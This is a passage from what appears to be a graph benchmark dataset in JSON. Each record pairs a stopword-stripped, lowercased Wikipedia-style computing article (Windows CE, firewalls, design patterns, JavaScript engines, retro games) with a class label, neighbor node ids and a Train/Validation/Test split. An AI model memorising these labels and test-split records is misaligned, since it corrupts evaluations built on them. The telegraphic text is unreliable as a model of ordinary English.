also bundled several utilities notable sound applet system tray enabling user quickly mute unmute device adjust volume 'pocket version paint release windows ce 2.0 well received microsoft learned lessons consumer feedback windows ce 1.0 made many improvements operating system start menu cascading menu identical found windows 95 windows nt 4.0 color screens also supported manufacturers raced release first color h/pc first market however hewlett packard hp 620lx windows ce 2.0 also supported broader range cpu architectures programs could also installed directly os double clicking cab files due nature roms contained operating system users able flash devices newer operating system instead manufacturers released upgrade roms users physically install devices removing previous version would usually wipe data device present user setup wizard upon first boot microsoft visual studio 2012 2013 2015 support apps platform builder development windows embedded compact 2013 microsoft visual studio 2008 earlier support projects older releases windows ce/windows mobile producing executable programs platform images either emulator attached cable actual mobile device mobile device necessary develop ce program .net compact framework supports subset .net framework projects c visual basic .net managed c++ managed apps employing .net compact framework also require devices significantly larger memories 8 mb unmanaged apps still run successfully smaller devices visual studio 2010 windows phone developer tools used extension allowing windows phone 7 apps designed tested within visual studio free pascal introduced windows ce port version 2.2.0 targeting arm x86 architectures later windows ce header files translated use lazarus rapid application development rad software package based free pascal windows ce apps designed coded lazarus integrated development environment ide compiled appropriate cross compiler programming tool used building platform bsp kernel device drivers shared source custom made also apps one stop environment get system running one also use platform builder export sdk software development kit target microprocessor superh x86 mips arm etc used another associated tool set named embedded visual c++ evc tool development embedded apps windows ce used standalone using sdk exported platform builder using platform builder platform manager connectivity setup codegear delphi prism runs visual studio also supports .net compact framework thus used develop mobile apps employs oxygene compiler created remobjects software targets .net .net compact framework mono command-line compiler available free charge basic4ppc programming language similar visual basic targets .net compact framework supports windows ce windows mobile devices glbasic easy learn use basic dialect compiles many platforms including windows ce windows mobile extended writing inline c/c++ code labview graphical programming language supporting many platforms including windows ce autohotkey port open source macro-creation automation software utility available windows ce allows construction macros simple gui apps developed systems analyst jonathan maxian timkang often windows ce windows mobile pocket pc used interchangeably part due common origin practice entirely accurate windows ce modular/componentized operating system serves foundation several classes devices modules provide subsets components features e.g varying levels windowing support dcom vs com others separate bitmap truetype font support others add additional features another component one buy kit platform builder contains components tools develop custom platform apps excel mobile formerly pocket excel part kit older handheld pc version pocket word several older apps included samples however windows mobile best described subset platforms based windows ce underpinning currently pocket pc called windows mobile classic smartphone windows mobile standard pocket pc phone edition windows mobile professional three main platforms windows mobile umbrella platform uses different components windows ce plus supplemental features apps suited respective devices pocket pc windows mobile microsoft-defined custom platforms general pda use consisting microsoft-defined set minimum profiles professional edition premium edition software hardware supported rules manufacturing pocket pc device stricter producing custom windows ce-based platform defining characteristics pocket pc touchscreen primary human interface device extremely portable size ce v3.0 basis pocket pc 2002 successor ce v3.0 ce.net pocketpc separate layer code top core windows ce os ... pocket pc based windows ce different offering licensees pocket pc forbidden modify wince part smartphone platform feature-rich os interface cellular phone handsets smartphone offers productivity features business users email multimedia abilities consumers smartphone interface relies heavily joystick navigation phonepad input devices running smartphone include touchscreen interface smartphone devices generally resemble cellular handset form factors whereas phone edition devices use pda form factor larger display",
    "neighbors": [
      516,
      6675,
      11283,
      9245,
      5663,
      10273,
      11301,
      6697,
      44,
      1581,
      2605,
      5681,
      1083,
      61,
      6207,
      7234,
      582,
      8262,
      1098,
      2635,
      2124,
      9808,
      603,
      8798,
      1632,
      10338,
      5220,
      1126,
      8296,
      5225,
      8299,
      7796,
      9332,
      11383,
      6265,
      5754,
      8315,
      1148,
      636,
      9851,
      639,
      641,
      2179,
      6276,
      6787,
      8326,
      10883,
      651,
      6797,
      9360,
      10896,
      2196,
      9366,
      7319,
      2201,
      154,
      3742,
      8355,
      10921,
      7341,
      3250,
      8882,
      11444,
      9910,
      10945,
      1221,
      9927,
      10957,
      3281,
      4305,
      2259,
      7893,
      1753,
      3289,
      4316,
      1253,
      3301,
      8423,
      7912,
      9448,
      9964,
      10989,
      10482,
      5363,
      3856,
      3857,
      1298,
      4369,
      8976,
      5406,
      10024,
      6441,
      10030,
      303,
      7983,
      3890,
      11063,
      2361,
      315,
      6462,
      10561,
      3400,
      6985,
      7496,
      9033,
      844,
      2380,
      6476,
      847,
      2383,
      341,
      11605,
      2391,
      10590,
      10079,
      11103,
      7523,
      4964,
      2919,
      11112,
      2943,
      8576,
      10623,
      10624,
      4995,
      3463,
      3975,
      5000,
      11149,
      8080,
      7057,
      3477,
      5526,
      4505,
      9628,
      10144,
      8098,
      4515,
      11683,
      8103,
      3496,
      426,
      428,
      7615,
      7106,
      3527,
      8136,
      6090,
      9162,
      9166,
      4051,
      9173,
      477,
      5600,
      6624,
      5603,
      8675,
      3561,
      4074,
      9194,
      5103,
      499,
      3573,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 322,
    "label": 4,
    "text": "XML_firewall:xml firewall xml firewall specialized device used protect applications exposed xml based interfaces like wsdl rest scan xml traffic coming organization typically deployed dmz environment xml firewall often used validate xml traffic control access xml based resources filter xml content rate limit requests back-end applications exposed xml based interfaces xml firewalls commonly deployed hardware also found software virtual appliance vmware xen amazon ec2 number brands xml firewall exist often differ based parameters like performance without hardware acceleration 32 vs 64 bit scalability cluster perform load security certification common criteria fips common identity support saml oauth enterprise sso solutions extensibility support different transport protocols like ibm mq tibco ems etc. xml firewalling functionality typically embedded inside xml appliances soa gateways",
    "neighbors": [
      8070,
      10020,
      6750
    ],
    "mask": "None"
  },
  {
    "node_id": 323,
    "label": 9,
    "text": "Greg_Nelson_(computer_scientist):greg nelson computer scientist charles gregory greg nelson 27 march 1953 – 2 february 2015 american computer scientist nelson grew honolulu boy excelled gymnastics tennis attended university laboratory school received b.a degree mathematics harvard university 1976 received ph.d. computer science stanford university 1980 supervision robert tarjan lived juneau year settling permanently san francisco bay area thesis work influenced program verification automated theorem proving especially area known satisfiability modulo theories contributed techniques combining decision procedures well efficient decision procedures quantifier-free constraints first-order logic term algebra received herbrand award 2013 instrumental development simplify theorem prover used esc/java also made significant contributions several areas contributed area programming language design member modula-3 committee distributed systems contributed network objects made pioneering contributions constraint-based graphics editors juno juno-2 window systems trestle optimal code generation denali multi-threaded programming eraser",
    "neighbors": [
      4341
    ],
    "mask": "Test"
  },
  {
    "node_id": 324,
    "label": 3,
    "text": "Bugaboo_(The_Flea):bugaboo flea bugaboo flea later published spain la pulga computer game created 1983 spanish team programmers paco paco zx spectrum later versions commodore 64 amstrad msx produced bugaboo besides first video game made spain one first computer games include cut scenes publication marked official beginning golden era spanish software ported amstrad cpc name roland caves exploit cpc recurring roland character sequel released spain opera soft title poogaboo made paco suarez one authors original game paco portalo member paco paco left project publication original game zx spectrum player takes control flea fallen cavern must escape game begins animation depicting bugaboo small yellow creature two extremely long legs jumping around colourful planet accidentally falling crack planet surface falling bottom cavern player must control bugaboo guide back top cavern safety planet surface two control keys left right key held gauge bottom screen begins fill key released bugaboo jump direction strength jump determined long key held cavern made various rocky ledges bugaboo may land however stand flat area jump mistimed bugaboo may end angled area rock miss ledge altogether cause fall straight landing whatever bugaboo may fall distance without dying way player lose life bugaboo make contact large yellow dragon wanders around cave bugaboo escape dragon carefully leaping away taking refuge inside one smaller caverns located around play area reviews overwhelmingly positive crash giving game 92 computer video games awarding 8/10 game month personal computer games giving 7/10 computer number one january 1984 crash said bugaboo high quality arcade standard game highly addictive game definitely top seller personal computer games said ... like challenge patient though easy get back top computer video games praised game breath-taking graphics perfect animation decided ... fresh original approach game design combined produce yet another top rate game tony hetherington computer gamer magazine included game spectrum collection 15 classic games spectrum owners game popularity spawned creation book 2009 entitled bugaboo un hito en la historia del software español francisco portalo calero i.e. paco portalo one original authors game published universidad de extremadura available online",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 325,
    "label": 3,
    "text": "Match_Day_II:match day ii match day ii football sports game part match day series released amstrad cpc amstrad pcw zx spectrum msx commodore 64 platforms created 1987 jon ritman graphics bernie drummond music sound guy stevens except commodore version line-by-line conversion john darnell controls consist four directions allowing eight directions including diagonals shot button team seven players including goalkeeper league cup options available game considered highly addictive due difficulty level complete control ball direction power elevation using diamond deflection system importance tactics player positioning field barging necessary makes challenging break strong defences first game use kickometer versions game play song saints go marching players walking initial positions field beginning half zx spectrum version game went number 2 uk sales charts behind run voted 10th best game time special issue sinclair magazine 2004 matchday ancestor videogame also another version game zx spectrum 128kb international match day including national teams game similar previous unpublished game jon ritman soccerama later 1995 jon ritman tried release match day iii due copyright problems change name game super match soccer",
    "neighbors": [
      8300,
      5556,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 326,
    "label": 4,
    "text": "Information_Sharing_and_Analysis_Center:information sharing analysis center information sharing analysis center isac nonprofit organization provides central resource gathering information cyber threats critical infrastructure providing two-way sharing information private public sector united states isacs assist federal local governments information pertaining cyber threats national council isacs nci directorate members include india information sharing analysis center isac operates independent non-profit organization works closely public-private-partner ppp apex nodal agency cyber security national critical information infrastructure protection center nciipc designated act law 2000",
    "neighbors": [
      2090,
      3994
    ],
    "mask": "None"
  },
  {
    "node_id": 327,
    "label": 4,
    "text": "Gerald_R._Young:gerald r. young gerald r. young american intelligence official deputy director national security agency 1988 1990 director william o. studeman time highest ranking civilian agency time nsa also held position deputy director plans policy",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      11335,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      1714,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "Validation"
  },
  {
    "node_id": 328,
    "label": 5,
    "text": "UDP_Helper_Address:udp helper address udp helper address special router configuration used forward broadcast network traffic client machine one subnet server another subnet internet protocol requires every network interface assigned least one unique ip address groups machines similar addresses considered part logical subnet one method assigning ip addresses dhcp addresses typically issued dhcp server running one hosts one machines subnet clients dhcp server respond broadcast dhcp requests issue address dhcp servers may hosted different subnet default routers pass broadcast messages nodes outside subnet resolve udp helper address established router configuration forward broadcast network traffic outside local subnet dhcp client outside dhcp server subnet broadcasts address request helper forwards message dhcp server server chooses address sends client unicast message using helper send message back client subnet address reserved limited time dhcp server waits response client responds another broadcast message dhcp server distributes address helper addresses also used forward udp traffic example bootp cisco first implementation protocol introduced version 10 router software implemented use router configuration commands codice_1 codice_2 enable forwarding user datagram protocol udp broadcasts including bootp received interface use ip helper-address command interface configuration mode disable forwarding broadcast packets specific addresses use form command ip helper-address vrf name global address redundancy vrg-name use udp helper addresses cause issues windows based network configurations see microsoft knowledge base details according microsoft issues stem fact ports 137,138 forwarded default cisco routers since ports used netbios help determine network configuration added broadcasts confuse system",
    "neighbors": [
      5472,
      3297,
      4490,
      1164,
      2996,
      5749,
      11413
    ],
    "mask": "Test"
  },
  {
    "node_id": 329,
    "label": 9,
    "text": "Comet_(programming_language):comet programming language comet commercial programming language designed brown university professor dr. pascal van hentenryck used solve complex combinatorial optimization problems areas resource allocation scheduling offers range optimization algorithms mathematical programming constraint programming local search algorithm dynamic stochastic combinatorial optimization comet programs specify local search algorithms two components approach promotes reusability across applications api allows used software library comet also features high-level abstractions parallel distributed computing based loop scheduling interruptions work stealing",
    "neighbors": [
      5830,
      8262,
      1039,
      8113,
      4019,
      9915,
      6718
    ],
    "mask": "None"
  },
  {
    "node_id": 330,
    "label": 7,
    "text": "Beowulf_cluster:beowulf cluster beowulf cluster computer cluster normally identical commodity-grade computers networked small local area network libraries programs installed allow processing shared among result high-performance parallel computing cluster inexpensive personal computer hardware name beowulf originally referred specific computer built 1994 thomas sterling donald becker nasa name beowulf comes old english epic poem name particular piece software defines cluster beowulf beowulf clusters normally run unix-like operating system bsd linux solaris normally built free open source software commonly used parallel processing libraries include message passing interface mpi parallel virtual machine pvm permit programmer divide task among group networked computers collect results processing examples mpi software include open mpi mpich additional mpi implementations available description beowulf cluster original how-to published jacek radajewski douglas eadline linux documentation project 1998. number linux distributions least one bsd designed building beowulf clusters include cluster set using knoppix bootable cds combination openmosix computers automatically link together without need complex configurations form beowulf cluster using cpus ram cluster beowulf cluster scalable nearly unlimited number computers limited overhead network provisioning operating systems software beowulf cluster automated using software open source cluster application resources oscar installs top standard installation supported linux distribution cluster head node",
    "neighbors": [
      7303,
      7049,
      785,
      7699,
      5397,
      2710,
      7963,
      6815,
      8992,
      5798,
      9126,
      6184,
      2345,
      4909,
      1454,
      4526,
      7218,
      8501,
      823,
      10111,
      4153,
      5948,
      4286,
      9151,
      2113,
      8514,
      5956,
      8901,
      4423,
      1480,
      1866,
      1995,
      8523,
      9932,
      4308,
      344,
      3801,
      2264,
      731,
      2140,
      9693,
      11487,
      4194,
      5090,
      11618,
      10597,
      7142,
      2536,
      3055,
      4463,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "None"
  },
  {
    "node_id": 331,
    "label": 4,
    "text": "Web_application_firewall:web application firewall web application firewall waf filters monitors blocks http traffic web application waf differentiated regular firewall waf able filter content specific web applications regular firewalls serve safety gate servers inspecting http traffic prevent attacks stemming web application security flaws sql injection cross-site scripting xss file inclusion security misconfigurations application firewalls control input output access applications services first developed early 1990s gene spafford bill cheswick marcus ranum product largely network-based firewall could handle applications like ftp rsh released market dec within next years products developed researchers provide stable firewall software others build raised bar industry dedicated web application firewalls entered market later decade web server hacker attacks becoming much noticeable first company offer dedicated web application firewall perfecto technologies appshield product focused e-commerce market protected illegal web page character entries perfecto renamed sanctum named top ten web application hacking techniques laid foundations waf market 2002 open source project modsecurity formed order make waf technology accessible solve obstacles within industry like business cases cost barriers proprietary rule-sets modsecurity finalized core rule set protecting web applications based oasis web application security technical committee ’ tc vulnerability work 2003 work expanded standardized open web application security project ’ owasp top 10 list annual ranking web security vulnerabilities list would become industry benchmark many compliance themes since market continued grow evolve involving larger commerce industry rise credit card fraud development payment card industry data security standard pci dss standard organizations increase controls cardholder data security regulated sparked wide-scale interest industry according ciso magazine waf market size expected grow 5.48 billion 2022 web application firewall special type application firewall applies specifically web applications deployed front web applications analyzes bi-directional web-based http traffic detecting blocking anything malicious owasp provides broad technical definition waf “ security solution web application level technical point view depend application itself. ” according pci dss information supplement requirement 6.6 waf defined “ security policy enforcement point positioned web application client endpoint functionality implemented software hardware running appliance device typical server running common operating system may stand-alone device integrated network components. ” words waf virtual physical appliance prevents vulnerabilities web applications exploited outside threats vulnerabilities may application legacy type insufficiently coded design waf addresses code shortcomings special configurations rule-sets also known policies previously unknown vulnerabilities discovered penetration testing via vulnerability scanner web application vulnerability scanner also known web application security scanner defined samate nist 500-269 “ automated program examines web applications potential security vulnerabilities addition searching web application-specific vulnerabilities tools also look software coding errors. ” resolving vulnerabilities commonly referred remediation corrections code made application typically prompt response necessary situations application custom policy unique web application vulnerability provide temporary immediate fix known virtual patch may necessary wafs ultimate security solution rather meant used conjunction network perimeter security solutions network firewalls intrusion prevention systems provide holistic defense strategy wafs typically follow positive security model negative security combination mentioned sans institute wafs use combination rule-based logic parsing signatures detect prevent attacks cross-site scripting sql injection owasp produces list top ten web application security flaws commercial waf offerings cover ten flaws minimum non-commercial options well mentioned earlier well-known open source waf engine called modsecurity one options waf engine alone insufficient provide adequate protection therefore owasp along trustwave spiderlabs help organize maintain core-rule set via github use modsecurity waf engine although names operating mode may differ wafs basically deployed inline three different ways according nss labs deployment options transparent bridge transparent reverse proxy reverse proxy 'transparent refers fact http traffic sent straight web application therefore waf transparent client server contrast reverse proxy waf acts proxy client ’ traffic sent directly waf waf separately sends filtered traffic web applications provide additional benefits ip masking may introduce disadvantages performance latency many commercial wafs similar features major differences often refer user interfaces deployment options requirements within specific environments notable vendors include notable open-source applications include",
    "neighbors": [
      10368,
      899,
      5636,
      3845,
      519,
      7688,
      1803,
      2705,
      5399,
      5404,
      3237,
      8998,
      939,
      10412,
      5295,
      10417,
      10492,
      5178,
      2238,
      1474,
      7035,
      7364,
      10437,
      2118,
      9293,
      10574,
      7248,
      467,
      1108,
      11221,
      4830,
      9055,
      225,
      4198,
      8170,
      107,
      8176,
      1907,
      5491,
      6773,
      4471,
      9465,
      5371,
      8956,
      2558,
      9855
    ],
    "mask": "Test"
  },
  {
    "node_id": 332,
    "label": 2,
    "text": "Index_of_Android_OS_articles:index android os articles list android operating system -related topics",
    "neighbors": [
      4995,
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      6057,
      5677,
      7595,
      8870,
      10537,
      3380,
      823,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      4685,
      3664,
      2001,
      3409,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      11252,
      7548,
      2045,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 333,
    "label": 9,
    "text": "Factory_method_pattern:factory method pattern class-based programming factory method pattern creational pattern uses factory methods deal problem creating objects without specify exact class object created done creating objects calling factory method—either specified interface implemented child classes implemented base class optionally overridden derived classes—rather calling constructor factory method design pattern one gang four design patterns describe solve recurring design problems design flexible reusable object-oriented software objects easier implement change test reuse factory method design pattern solves problems like creating object directly within class requires uses object inflexible commits class particular object makes impossible change instantiation independently without change class factory method design pattern describes solve problems enables writing subclasses change way object created redefine class instantiate br see also uml class diagram define interface creating object let subclasses decide class instantiate factory method lets class defer instantiation uses subclasses gang four creating object often requires complex processes appropriate include within composing object object creation may lead significant duplication code may require information accessible composing object may provide sufficient level abstraction may otherwise part composing object concerns factory method design pattern handles problems defining separate method creating objects subclasses override specify derived type product created factory method pattern relies inheritance object creation delegated subclasses implement factory method create objects uml class diagram codice_1 class requires codice_2 object n't instantiate codice_3 class directly instead codice_1 refers separate codice_5 create product object makes codice_1 independent concrete class instantiated subclasses codice_1 redefine class instantiate example codice_8 subclass implements abstract codice_5 instantiating codice_3 class maze game may played two modes one regular rooms connected adjacent rooms one magic rooms allow players transported random codice_11 base class final product codice_12 codice_13 codice_14 declares abstract factory method produce base product codice_12 codice_13 subclasses base product implementing final product codice_17 codice_18 subclasses codice_14 implementing factory method producing final products thus factory methods decouple callers codice_14 implementation concrete classes makes new operator redundant allows adherence open/closed principle makes final product flexible event change code c code see creation one interface called iperson two implementations called villager cityperson based type passed factory object returning original concrete object interface iperson factory method addition factory class creates object class interfaces hand also lets subclass decide class instantiated see used makeproduct concretefactory result easily call makeproduct get iproduct might also write custom logic getting object concrete factory method getobject made abstract factory interface java example similar one book design patterns mazegame uses rooms puts responsibility creating rooms subclasses create concrete classes regular game mode could use template method snippet codice_14 constructor template method makes common logic refers codice_22 factory method encapsulates creation rooms rooms used subclass implement game mode magic rooms suffices override codice_22 method another example php follows time using interface implementations opposed subclassing however achieved subclassing important note factory method also defined public called directly client code contrast java example java example factory pattern deals instantiation objects without exposing instantiation logic words factory actually creator objects common interface 'empty vocabulary actual object public interface iperson end interface public class villager end class public class cityperson end class public enum persontype end enum public class factory end class",
    "neighbors": [
      1280,
      7175,
      5257,
      9225,
      4107,
      5772,
      3733,
      3990,
      2456,
      5537,
      8100,
      4777,
      5677,
      2222,
      9263,
      8640,
      8644,
      11343,
      337,
      4817,
      10581,
      7894,
      2011,
      734,
      8928,
      8929,
      4194,
      8554,
      5357,
      1142,
      10617,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 334,
    "label": 5,
    "text": "Message_Oriented_Text_Interchange_Systems:message oriented text interchange systems message-oriented text interchange system motis iso messaging standard based itu-t x.400 standards plays similar role simple mail transfer protocol smtp tcp/ip protocol suite",
    "neighbors": [
      9909,
      1086
    ],
    "mask": "Test"
  },
  {
    "node_id": 335,
    "label": 9,
    "text": "Semipredicate_problem:semipredicate problem computer programming semipredicate problem occurs subroutine intended return useful value fail signalling failure uses otherwise valid return value problem caller subroutine tell result means case division operation yields real number fails divisor zero write function performs division might choose return 0 invalid input however dividend 0 result 0 means number return uniquely signal attempted division zero since real numbers range division early programmers dealt potentially exceptional cases case division using convention required calling routine check validity inputs calling division function two problems first greatly encumbers code performs division common operation second violates n't repeat encapsulation principles former eliminating duplicated code latter suggests data associated code contained one place case verification input done separately imagine complicated computation division could hard caller know considered invalid input cases figuring whether input valid may costly performing entire computation also possibility target function modified expecting different preconditions ones caller checked change would require changes places function called semipredicate problem universal among functions fail function range cover entire data type defined function value known impossible normal computation used example consider function codice_1 takes string substring returns integer index substring main string search fails function may programmed return -32,768 negative value since never signify successful result solution problems though overloads natural meaning function arbitrary convention first programmer must remember specific failure values many functions course identical functions different domains second different implementation function may choose use different failure value resulting possible bugs programmers move environment environment third failing function wishes communicate useful information failed one failure value insufficient fourth signed integer halves possible index range able store sign bit many languages allow one mechanism another function return multiple values available function redesigned return boolean value signalling success failure addition primary return value multiple error modes possible function may instead return enumerated return code error code addition primary return value various techniques returning multiple values include similar argument global variable store error occurred simply whether error occurred instance error occurs signalled generally illegal value like −1 unix errno variable set indicate value occurred using global usual drawbacks thread safety becomes concern modern operating systems use thread-safe version errno one error global used type must wide enough contain interesting information possible errors system exceptions one widely used scheme solving problem error condition considered return value function normal control flow disrupted explicit handling error takes place automatically example out-of-band signalling c common approach possible use data type deliberately wider strictly needed function example standard function codice_3 defined return type codice_4 returns unsigned char success value codice_5 implementation-defined outside range 0 255 end input read error languages pointers references one solution return pointer value rather value return pointer set null indicate error typically suited functions return pointer anyway performance advantage oop style exception handling drawback negligent programmers may check return value resulting crash invalid pointer used common pattern unix environment setting separate variable indicate cause error example c standard library fopen function scripting languages php lisp usual approach return false none null function call fails works returning different type normal return type thus expanding type dynamically-typed equivalent returning null pointer example numeric function normally returns number int float zero might valid response false similarly function normally returns string might sometimes return empty string valid response return false failure process type-juggling necessitates care testing return value e.g php use === i.e equal type rather == i.e equal automatic type-conversion works original function meant return boolean value still requires information error conveyed via means haskell functional programming languages common use data type big needs express possible result example could write division function returned type codice_6 codice_7 function returning codice_8 first option type one failure value codice_9 second case tagged union result either string descriptive error message successfully read character haskell type inference system helps ensure callers deal possible errors since error conditions become explicit function type looking signature immediately tells programmer treat errors addition tagged unions option types form monads endowed appropriate functions may used keep code tidy automatically propagating unhandled error conditions",
    "neighbors": [
      1152,
      10043,
      10145,
      10435,
      8644,
      6502,
      8554,
      2062,
      4592,
      10555,
      9780,
      7609,
      1435,
      2045,
      8414
    ],
    "mask": "Test"
  },
  {
    "node_id": 336,
    "label": 3,
    "text": "PowerPC_e700:powerpc e700 powerpc e700 ng-64 next generation 64-bit codenames freescale first 64-bit embedded risc-processor cores 2004 freescale announced new high performance core much known would multi core multithreaded design using corenet technology shared e500mc core would three issue core double precision fpu roadmaps showed target frequency 3+ ghz manufactured 32 nm process chips would named mpc87xx scheme freescale released core similar specifications june 2010 called e5500",
    "neighbors": [
      6914,
      7299,
      4868,
      10501,
      1158,
      3846,
      4743,
      7302,
      5642,
      3467,
      1548,
      1933,
      7305,
      6415,
      3472,
      2073,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      11314,
      1461,
      11447,
      8120,
      8761,
      6715,
      9020,
      1725,
      1983,
      10945,
      10180,
      5448,
      3017,
      8530,
      3540,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      1635,
      7269,
      10214,
      10985,
      9964,
      8048,
      3185,
      10224,
      4211,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 337,
    "label": 9,
    "text": "Iterator_pattern:iterator pattern object-oriented programming iterator pattern design pattern iterator used traverse container access container elements iterator pattern decouples algorithms containers cases algorithms necessarily container-specific thus decoupled example hypothetical algorithm searchforelement implemented generally using specified type iterator rather implementing container-specific algorithm allows searchforelement used container supports required type iterator iterator design pattern one twenty-three well-known gof design patterns describe solve recurring design problems design flexible reusable object-oriented software objects easier implement change test reuse problems iterator design pattern solve defining access traversal operations aggregate interface inflexible commits aggregate particular access traversal operations makes impossible add new operations later without change aggregate interface solution iterator design pattern describe different iterators used access traverse aggregate different ways br new access traversal operations defined independently defining new iterators see also uml class sequence diagram essence iterator pattern provide way access elements aggregate object sequentially without exposing underlying representation. uml class diagram codice_1 class refers 1 codice_2 interface creating codice_3 object codice_4 2 codice_3 interface traversing codice_2 object codice_7 codice_8 class implements codice_3 interface accessing codice_10 class uml sequence diagram shows run-time interactions codice_1 object calls codice_4 codice_10 object creates codice_8 object returns codice_1 codice_1 uses codice_8 traverse elements codice_10 object languages standardize syntax c++ python notable examples .net framework special interfaces support simple iteration codice_19 non-generic collection codice_20 generic collection c statement codice_21 designed easily iterate collection implements codice_19 and/or codice_20 interface since c v2 codice_21 also able iterate types implement codice_25 codice_20 example using codice_21 statement c++ implements iterators semantics pointers language c++ class overload pointer operations iterator implemented acts less like pointer complete dereference increment decrement advantage c++ algorithms codice_28 immediately applied plain old memory buffers new syntax learn however requires end iterator test equality rather allowing iterator know reached end c++ language say iterator models iterator concept java interface simple example showing return integers start end using codice_3 import java.util.iterator import java.util.nosuchelementexception public class rangeiteratorexample java 5 objects implementing interface returns codice_3 method traversed using java foreach loop syntax interface java collections framework extends codice_31 example class codice_32 implementing codice_31 interface import java.util.iterator import java.util.set class family e implements iterable e class codice_34 demonstrates use class codice_32 public class iterableexample output ron weasley molly weasley percy weasley fred weasley charlie weasley george weasley arthur weasley ginny weasley bill weasley javascript part ecmascript 6 supports iterator pattern object provides codice_36 method returns object two specific properties codice_37 codice_38 example shows reverse array iterator time though want provide iterator semantics objects iterated automatically via codice_39 loops javascript built-in types codice_40 codice_41 codice_42 already define iteration behavior achieve effect defining object meta codice_43 method also referred codice_44 creates iterable object example range function generates list values starting codice_45 codice_46 exclusive using regular codice_47 loop generate numbers iteration mechanism built-in types like strings also manipulated php supports iterator pattern via iterator interface part standard distribution objects implement interface iterated codice_21 language construct example patterns using php string 15 design patterns python prescribes syntax iterators part language language keywords codice_47 work python calls sequences sequence codice_50 method returns iterator object iterator protocol requires codice_36 return next element raise codice_52 exception upon reaching end sequence iterators also provide codice_50 method returning also iterated e.g. using codice_47 loop generators available since 2.2 python 3 codice_36 renamed codice_56",
    "neighbors": [
      1280,
      3076,
      3462,
      7175,
      5257,
      9225,
      4107,
      5772,
      3733,
      3990,
      8854,
      2456,
      155,
      5537,
      8100,
      2222,
      8640,
      8644,
      333,
      11343,
      4817,
      10581,
      2011,
      734,
      479,
      8928,
      8929,
      4194,
      8554,
      5357,
      3573,
      1142
    ],
    "mask": "Train"
  },
  {
    "node_id": 338,
    "label": 9,
    "text": "Squirrel_(programming_language):squirrel programming language squirrel high level imperative object-oriented programming language designed lightweight scripting language fits size memory bandwidth real-time requirements applications like video games hardware electric imp mirthkit simple toolkit making distributing open source cross-platform 2d games uses squirrel platform used extensively scripting also used also used left 4 dead 2 portal 2 thimbleweed park scripted events squirrel uses c-like syntax language made public 2003 zlib/libpng license november 2010 license changed mit license enable project hosted google code developed maintained alberto demichelis",
    "neighbors": [
      2304,
      9345,
      3462,
      9490,
      8854,
      9245,
      541,
      1952,
      4777,
      7983,
      7219,
      9780,
      8262,
      1999,
      7513,
      4186,
      8554,
      5612,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 339,
    "label": 9,
    "text": "JavaScript_engine:javascript engine javascript engine computer program executes javascript code first javascript engines mere interpreters relevant modern engines utilize just-in-time compilation improved performance javascript engines typically developed web browser vendors every major browser one browser javascript engine runs concert rendering engine via document object model use javascript engines limited browsers example chrome v8 engine core component popular node.js runtime system since ecmascript standardized specification javascript ecmascript engine another name engines first javascript engine created brendan eich 1995 netscape navigator web browser rudimentary interpreter nascent language eich invented evolved spidermonkey engine still used firefox browser first modern javascript engine v8 created google chrome browser v8 debuted part chrome 2008 performance much better prior engine key innovation just-in-time compilation significantly improve execution times browser vendors needed overhaul interpreters compete apple developed nitro engine safari browser 30 better performance predecessor mozilla leveraged portions nitro improve spidermonkey engine opera replaced interpreter carakan engine twice fast cases since 2017 browsers added support webassembly enables use pre-compiled executables performance-critical portions page scripts javascript engines execute webassembly code sandbox regular javascript code",
    "neighbors": [
      1409,
      259,
      8068,
      3462,
      6791,
      8584,
      9736,
      1802,
      6154,
      10507,
      1295,
      8854,
      4378,
      8605,
      7455,
      6176,
      8609,
      1698,
      803,
      5031,
      3761,
      1203,
      11060,
      438,
      4920,
      1470,
      5311,
      2880,
      7871,
      9152,
      4171,
      5067,
      5708,
      11087,
      4048,
      84,
      3413,
      4822,
      5078,
      4056,
      9560,
      9561,
      603,
      220,
      8923,
      8289,
      482,
      5219,
      7396,
      4326,
      487,
      5483,
      4972,
      5101,
      9195,
      10991,
      10097,
      9714,
      9843,
      10739,
      10744,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 340,
    "label": 2,
    "text": "Attached_Support_Processor:attached support processor attached support processor asp implementation loosely coupled multiprocessing ibm os/360 operating system ibm later changed name asymmetrical multiprocessor retained acronym asp asp evolved design 7094/7044 direct coupled system using data channel data channel communication attaching ibm 7044 peripheral processor throughput 7094 doubled asp introduced march 1967 initially allowed connection two system/360 computers via channel-to-channel adapter ctca initially defined asp system consisted large system/360 computer model 50 65 75 running os/360 called main processor smaller system/360 model 40 larger called support processor running asp supervisor single task os/360 pcp primary control program support processor performed functions printing card reading punching freeing main processor run application workload queued jobs roughly 30 basic configuration released main processor priority order also pre-execution setup removable input/output devices disks tapes main processor main processor configured identically stand-alone processor operating os/360 except channel-to-channel adapter replaces normal system input output devices support processor minimum model 40 g g indicates memory size 128kb two selector channels 1052 console typewriter 2540 card read/punch 1403 printer three 2311 disk drives recommended support processor access one 2400-series tape drive support os version main processor modified able overlay 7090/94 emulator program emulator job run emulator program would similarly overlay os/360 done process emulated 709x jobs intermixed standard 360 jobs later became unnecessary introduction integrated emulation programs 360/85 s/370 later ibm allowed single support processor control multiple main processors added 